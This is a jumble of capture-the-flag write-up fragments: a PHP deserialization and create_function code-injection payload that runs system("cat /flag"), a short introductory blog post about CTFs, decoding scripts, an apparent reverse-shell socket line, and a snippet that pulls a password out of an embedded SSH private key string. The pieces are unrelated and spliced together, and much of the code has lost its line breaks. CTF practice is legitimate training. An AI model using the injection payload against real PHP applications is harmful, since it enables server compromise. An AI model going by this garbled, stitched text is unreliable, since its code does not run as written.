

利用这个create_function函数闭合前面括号进行代码执行echo 2;}system(“cat /flag”);//

class func
{public $mod1;public $mod2;public $key;
class GetFlag
{   public $code = 'echo 2;}system("cat /flag");//';public $action = 'create_function';
$cjm1 = new func();
$cjm2 = new GetFlag;
$cjm1->key = serialize(array($cjm2,'get_flag'));
echo serialize($cjm1);
O:4:"func":3:{s:4:"mod1";N;s:4:"mod2";N;s:3:"key";s:132:"a:2:{i:0;O:7:"GetFlag":2:{s:4:"code";s:30:"echo 2;}system("cat /flag");//";s:6:"action";s:15:"create_function";}i:1;s:8:"get_flag";}";}





What is CTF and how to get started!
CTFs are one of my favorite hobbies. I love the feeling of solving a particularly difficult task and seeing all the puzzle pieces click together. I'd like this post to serve as an introduction to CTF for those in the dev.to community that may not know what it is.
So what is CTF?
CTF (Capture The Flag) is a kind of information security competition that challenges contestants to solve a variety of tasks ranging from a scavenger hunt on wikipedia to basic programming exercises, to hacking your way into a server to steal data. In these challenges, the contestant is usually asked to find a specific piece of text that may be hidden on the server or behind a webpage. This goal is called the flag, hence the name!
Like many competitions, the skill level for CTFs varies between the events. Some are targeted towards professionals with experience operating on cyber security teams. These typically offer a large cash reward and can be held at a specific physical location. Other events target the high school and college student range, sometimes offering monetary support for education to those that place highly in the competition!
CTFtime details the different types of CTF. To summarize, Jeopardy style CTFs provide a list of challenges and award points to individuals or teams that complete the challenges, groups with the most points wins. Attack/Defense style CTFs focus on either attacking an opponent's servers or defending one's own. These CTFs are typically aimed at those with more experience and are conducted at a specific physical location.
CTFs can be played as an individual or in teams so feel free to get your friends onboard!
I'd like to stress that CTFs are available to everyone. Many challenges do not require programming knowledge and are simply a matter of problem solving and creative thinking.
Challenge types
Jeopardy style CTFs challenges are typically divided into categories. I'll try to briefly cover the common ones.
Cryptography - Typically involves decrypting or encrypting a piece of data
Steganography - Tasked with finding information hidden in files or images
Binary - Reverse engineering or exploiting a binary file
Web - Exploiting web pages to find the flag
Pwn - Exploiting a server to find the flag
Please decode this:4%G#n+Wc?tpPU!b!Dv]RBfXx\ZP\n39iI+F;:SY,F!x9(B(3@E_(mwc7F2
Where do I start?
If I managed to pique your curiosity, I've compiled a list of resources that helped me get started learning. CTF veterans, feel free to add your own resources in the comments below!



import matplotlib.pyplot as plt
import matplotlib as mpl
x,y = [], []
mpl.rcParams[‘font.family’] = ‘sans-serif’
mpl.rcParams[‘font.sans-serif’] = ‘NSimSun,Times New Roman’
with open(‘1.txt’, ‘r’) as fd:
lines = fd.readlines()
for line in lines:
line = eval(line)
for tup in line:
plt.plot(x, y, ‘.’, label=‘test’, color=‘red’)





def smol_sqr(x, y):n = len(x)x_mean = sum(x) / len(x)  # x with a dashy_mean = sum(y) / len(y)  # y with a dasha_hat = [0, 0]for i in range(n):sub_mean = x[i] - x_meany_sub_mean = y[i] * sub_meansub_mean_sqr = sub_mean ** 2a_hat[0] += y_sub_meana_hat[1] += sub_mean_sqr# print('x: %d, y: %.2f, %.2f, %.2f, %.2f' % (x[i],y[i],sub_mean,y_sub_mean,sub_mean_sqr))a_hat = a_hat[0] / a_hat[1]b_hat = y_mean - x_mean * a_hat# print('a-hat: %.10f, b-hat: %.10f' % (a_hat, b_hat))return a_hat, b_hat
dataset=[[(376, 38462.085), (485, 49579.895), (28, 2964.377), (390, 39888.567), (222, 22753.108), (388, 39685.235), (24, 2556.346), (204, 20916.088), (45, 4698.592), (9, 1026.251), (428, 43765.177), (334, 34176.356), (205, 21018.683), (218, 22344.21), (69, 7146.245), (347, 35503.166), (479, 48967.208), (213, 21834.244), (227, 23262.95), (460, 47029.989), (118, 12144.819), (491, 50192.035), (44, 4596.27), (241, 24690.668), (476, 48661.456), (18, 1944.416), (427, 43664.197), (214, 21936.838), (274, 28056.588), (272, 27853.2)],
[(85, 8348.621), (346, 33665.322), (101, 9900.75), (286, 27845.358), (490, 47634.336), (256, 24935.159), (499, 48507.783), (384, 37352.466), (314, 30561.655), (47, 4662.515), (279, 27166.774), (449, 43656.702), (415, 40358.941), (335, 32598.173), (445, 43269.738), (257, 25033.479), (56, 5535.53), (484, 47053.0), (24, 2431.123), (447, 43463.332), (252, 24547.35), (269, 26197.073), (375, 36478.885), (467, 45404.153), (299, 29106.661), (410, 39874.781), (111, 10870.232), (162, 15817.212), (473, 45985.348), (428, 41620.527)],
[(482, 59363.599), (493, 60717.612), (242, 29842.836), (403, 49645.494), (257, 31687.884), (418, 51490.659), (382, 47062.795), (172, 21232.594), (409, 50383.537), (37, 4627.411), (113, 13975.622), (283, 34886.502), (62, 7702.363), (438, 53951.295), (95, 11761.148), (164, 20248.214), (270, 33287.123), (60, 7456.365), (89, 11023.68), (165, 20371.405), (222, 27382.086), (416, 51244.099), (433, 53335.646), (422, 51983.683), (29, 3643.292), (466, 57395.086), (109, 13483.208), (200, 24677.075), (371, 45710.712), (325, 40052.51)],
[(214, 10596.501), (338, 16672.817), (383, 18878.996), (198, 9813.117), (149, 7411.18), (439, 21621.139), (12, 698.274), (30, 1580.109), (425, 20935.333), (372, 18338.869), (52, 2658.353), (282, 13928.514), (421, 20740.908), (242, 11968.381), (223, 11037.519), (46, 2364.361), (314, 15497.448), (225, 11135.62), (210, 10400.927), (168, 8342.544), (104, 5206.607), (175, 8685.26), (437, 21523.478), (55, 2805.311), (419, 20642.936), (79, 3981.11), (473, 23287.359), (207, 10253.953), (379, 18682.114), (498, 24512.699)],
[(444, 22697.484), (201, 10303.965), (442, 22594.985), (268, 13720.463), (215, 11018.358), (64, 3316.136), (99, 5101.527), (117, 6019.476), (42, 2194.3), (235, 12037.331), (447, 22850.954), (491, 25093.206), (400, 20452.699), (409, 20911.527), (303, 15505.555), (430, 21983.053), (166, 8518.432), (91, 4693.31), (197, 10099.772), (147, 7549.539), (115, 5917.528), (390, 19942.57), (396, 20250.15), (386, 19739.285), (144, 7396.758), (185, 9488.074), (308, 15761.079), (299, 15301.183), (453, 23156.869), (326, 16678.433)],
[(157, 17994.029), (466, 53219.713), (298, 34067.876), (336, 38400.176), (404, 46152.114), (35, 4085.249), (370, 42277.13), (74, 8531.099), (38, 4427.459), (356, 40680.902), (461, 52649.548), (103, 11837.351), (287, 32814.011), (153, 17537.147), (105, 12065.227), (165, 18905.831), (383, 43758.064), (14, 1691.277), (149, 17081.899), (48, 5567.135), (60, 6935.317), (183, 20958.053), (425, 48546.553), (124, 14231.309), (154, 17651.315), (305, 34865.077), (225, 25745.798), (22, 2603.436), (260, 29735.779), (268, 30648.491)],
[(35, 2921.193), (74, 6119.615), (366, 30063.851), (84, 6939.611), (445, 36541.644), (266, 21864.537), (44, 3659.23), (21, 1773.203), (281, 23094.394), (446, 36625.1), (134, 11039.599), (224, 18419.597), (125, 10301.272), (187, 15386.092), (27, 2265.144), (384, 31540.715), (312, 25636.875), (81, 6693.404), (256, 21043.915), (272, 22355.386), (413, 33917.33), (466, 38263.262), (10, 871.15), (322, 26455.254), (491, 40314.018), (285, 23422.235), (299, 24569.304), (314, 25799.903), (472, 38756.921), (207, 17025.119)],
[(18, 1909.09), (423, 43626.197), (443, 45686.428), (434, 44759.148), (227, 23436.716), (129, 13342.914), (6, 673.051), (30, 3145.382), (182, 18801.909), (53, 5514.395), (38, 3969.362), (306, 31573.971), (449, 46303.27), (342, 35281.657), (208, 21479.106), (58, 6029.494), (426, 43933.203), (31, 3248.286), (455, 46921.265), (46, 4793.37), (67, 6956.534), (436, 44964.671), (352, 36311.115), (39, 4072.332), (482, 49703.378), (36, 3763.208), (490, 50525.775), (404, 41667.513), (411, 42389.72), (87, 9016.124)],
[(466, 47119.357), (238, 24091.99), (378, 38231.425), (397, 40151.664), (62, 6315.361), (16, 1669.443), (495, 50048.255), (248, 25101.314), (97, 9850.418), (496, 50149.486), (250, 25303.773), (254, 25708.162), (151, 15304.476), (298, 30151.49), (39, 3992.359), (301, 30455.131), (487, 49240.674), (137, 13890.614), (170, 17223.704), (12, 1265.129), (306, 30959.984), (324, 32777.275), (354, 35808.118), (259, 26213.599), (61, 6214.064), (315, 31869.574), (419, 42373.779), (36, 3689.172), (56, 5709.441), (347, 35101.57)],
[(128, 10673.706), (410, 34080.113), (400, 33250.109), (495, 41134.303), (102, 8515.216), (388, 32253.575), (421, 34992.384), (126, 10507.612), (448, 37233.402), (230, 19139.667), (432, 35905.656), (343, 28519.819), (224, 18641.439), (16, 1377.078), (70, 5859.254), (188, 15653.68), (41, 3452.216), (262, 21795.981), (452, 37565.629), (496, 41218.974), (48, 4033.309), (19, 1626.453), (179, 14906.658), (490, 40720.602), (293, 24368.848), (17, 1460.317), (315, 26195.299), (351, 29182.612), (219, 18226.844), (192, 15985.401)],
[(366, 17679.993), (311, 15039.672), (144, 7022.587), (56, 2798.177), (40, 2030.32), (86, 4238.677), (393, 18974.814), (409, 19742.828), (266, 12878.464), (53, 2654.169), (356, 17199.18), (233, 11294.64), (70, 3470.511), (89, 4382.363), (80, 3950.705), (378, 18255.237), (139, 6782.707), (120, 5870.596), (31, 1598.134), (492, 23728.638), (453, 21856.637), (210, 10190.151), (47, 2366.403), (306, 14798.785), (235, 11390.721), (22, 1166.112), (471, 22719.415), (108, 5294.502), (413, 19936.025), (329, 15903.103)],
[(400, 38065.613), (406, 38635.921), (426, 40536.452), (228, 21725.303), (484, 46046.395), (297, 28280.548), (176, 16786.046), (316, 30085.821), (35, 3390.384), (315, 29990.94), (421, 40060.658), (448, 42627.029), (396, 37685.191), (458, 43575.818), (366, 34836.594), (474, 45095.324), (476, 45287.017), (36, 3485.245), (473, 45000.45), (22, 2155.411), (409, 38920.804), (362, 34455.627), (196, 18685.953), (450, 42816.42), (86, 8235.263), (266, 25335.452), (427, 40631.459), (423, 40252.254), (115, 10990.549), (180, 17165.868)],
[(399, 37977.029), (141, 13467.056), (491, 46716.435), (236, 22491.873), (415, 39497.438), (239, 22776.126), (378, 35981.953), (404, 38452.185), (20, 1971.333), (392, 37312.171), (348, 33131.705), (68, 6531.521), (116, 11091.687), (24, 2351.378), (377, 35886.753), (352, 33511.265), (186, 17741.408), (64, 6151.27), (238, 22681.308), (156, 14891.645), (77, 7386.51), (264, 25151.192), (311, 29616.833), (481, 45766.877), (229, 21826.112), (124, 11851.454), (204, 19452.046), (74, 7101.408), (101, 9666.573), (23, 2256.442)],
[(462, 22255.567), (404, 19472.985), (148, 7183.731), (116, 5647.385), (54, 2671.354), (129, 6271.643), (396, 19089.092), (104, 5071.365), (351, 16928.509), (263, 12704.488), (231, 11167.616), (203, 9824.242), (433, 20865.24), (380, 18319.847), (19, 991.333), (170, 8239.438), (61, 3007.183), (77, 3775.341), (193, 9343.796), (160, 7759.819), (113, 5503.85), (459, 22113.195), (472, 22735.985), (497, 23937.354), (121, 5887.589), (346, 16687.957), (332, 16016.091), (461, 22207.374), (145, 7039.67), (101, 4927.526)],
[(356, 35695.781), (323, 32396.312), (99, 9995.636), (274, 27495.776), (284, 28495.424), (37, 3795.292), (114, 11495.772), (381, 38195.254), (415, 41595.773), (45, 4595.278), (205, 20596.234), (418, 41896.749), (282, 28296.166), (228, 22896.214), (338, 33896.127), (84, 8495.355), (237, 23795.222), (414, 41495.335), (247, 24795.385), (133, 13395.59), (177, 17795.921), (481, 48195.587), (399, 39995.328), (435, 43595.973), (476, 47696.302), (347, 34797.091), (75, 7595.72), (224, 22495.502), (402, 40296.272), (139, 13995.28)],
[(334, 28161.025), (74, 6320.272), (244, 20600.842), (94, 8000.706), (174, 14720.587), (99, 8420.104), (484, 40761.531), (493, 41517.869), (447, 37652.765), (49, 4220.412), (499, 42021.241), (298, 25137.81), (79, 6740.362), (169, 14301.015), (439, 36981.933), (216, 18249.141), (476, 40090.247), (462, 38913.015), (413, 34798.204), (480, 40424.342), (491, 41349.055), (150, 12704.648), (433, 36477.326), (13, 1196.272), (400, 33705.346), (114, 9680.556), (127, 10772.474), (62, 5312.143), (295, 24884.463), (230, 19425.274)],
[(95, 4765.293), (138, 6872.432), (433, 21328.028), (432, 21280.189), (418, 20592.642), (344, 16967.601), (6, 404.037), (280, 13830.566), (175, 8685.604), (107, 5353.385), (487, 23975.472), (311, 15349.847), (473, 23288.902), (137, 6823.531), (427, 21033.375), (181, 8980.196), (453, 22308.892), (411, 20249.344), (328, 16183.891), (462, 22750.113), (407, 20054.791), (480, 23630.328), (31, 1629.26), (26, 1384.165), (170, 8440.836), (160, 7950.83), (58, 2952.176), (451, 22210.281), (43, 2217.416), (258, 12752.142)],
[(353, 36485.204), (305, 31540.781), (117, 12176.054), (130, 13515.348), (25, 2700.292), (120, 12485.819), (436, 45035.347), (254, 26287.979), (168, 17429.391), (484, 49979.295), (283, 29274.878), (112, 11661.515), (285, 29480.534), (173, 17944.669), (188, 19489.607), (371, 38339.416), (110, 11455.441), (49, 5172.438), (176, 18253.645), (72, 7541.458), (23, 2494.27), (262, 27111.683), (95, 9910.366), (175, 18150.397), (185, 19180.361), (133, 13824.115), (229, 23712.332), (27, 2906.355), (129, 13412.875), (381, 39369.318)]]for i in range(len(dataset)):data = dataset[i]x,y = [], []for d in data:x.append(d[0])y.append(d[1])ret, ret1 = smol_sqr(x,y)print(chr(round(ret))+chr(round(ret1)), end='')


file test
test: PE32+ executable (console) x86-64, for MS Windows


ssls.send(str.encode(str(os.getcwd()) + ‘<’ + ‘’.join([yyy[_] for _ in xxx]) + ‘>’ + ’ > '))

xxx = [358, 118, 30, 43, 127, 5, 282, 133, 56, 43, 116, 68, 68, 147, 96, 13, 130, 4, 15, 35, 297, 57, 36, 83, 38, 93, 40, 147]yyy = '--- BEGIN PRIVATE KEY ---\t\tb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW'
yyy += '\t\tQyNTUxOQAAACCKvwHFw4alzEkncA+lDf3VeQ2ZNjX7gur4TzJFQlSgRwAAAJA8ULvmPFC7'
yyy += '\t\t5gAAAAtzc2gtZWQyNTUxOQAAACCKvwHFw4alzEkncA+lDf3VeQ2ZNjX7gur4TzJFQlSgRw'
yyy += '\t\tAAAEAMNUtG4HZ42kMsON1XY/y1lGyPns8JB6JYwi936VUuz4q/AcXDhqXMSSdwD6UN/dV5'
yyy += '\t\tDZk2NfuC6vhPMkVCVKBHAAAACXJvb3RAa2FsaQECAwQ=\t\t--- END PRIVATE KEY ---'to_pass = [yyy[_] for _ in xxx]
final_pass = ''
for i in to_pass:final_pass += iprint(final_pass)

保存使用stegsolve打开在blue 0通道看到二维码,扫描得flag


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